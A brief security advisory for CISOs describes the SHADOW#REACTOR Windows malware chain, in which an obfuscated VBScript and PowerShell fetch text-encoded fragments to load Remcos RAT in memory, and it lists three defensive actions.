A multi-stage Windows malware uses text-based payloads to invoke a PowerShell Downloader, known as SHADOW#REACTOR. The malware has been identified by Securonix researchers as a sophisticated Windows threat employing a multi-stage delivery mechanism. Initial infection occurs when a victim runs an obfuscated Visual Basic Script (typically delivered via social engineering or compromised websites), which then spawns PowerShell processes to retrieve segmented payload fragments from a remote host. These fragments are encoded as plain text files (e.g., .txt) to evade traditional binary detection and are later reconstructed in memory using reflective loading techniques linked to Remcos RAT. This layered approach complicates detection and enables persistent remote access.
Who is affected
Windows systems where users execute untrusted scripts are at direct risk of SHADOW#REACTOR infection and subsequent installation of remote access tools; enterprise environments relying on endpoint defenses may face undetected in-memory threats.
Why CISOs should care
This campaign highlights increasing threat actor sophistication in using living-off-the-land tools and text-based staging to bypass detection, emphasizing the need for advanced behavioral monitoring and script control to mitigate in-memory malware threats.
3 practical actions
- Control script execution: Restrict execution of scripts from untrusted sources and enforce application control policies.
- Enhance behavioral detection: Deploy endpoint detection capable of identifying anomalous PowerShell and in-memory activity.
- Educate users on phishing risks: Train staff to recognize and avoid executing suspicious attachments or links.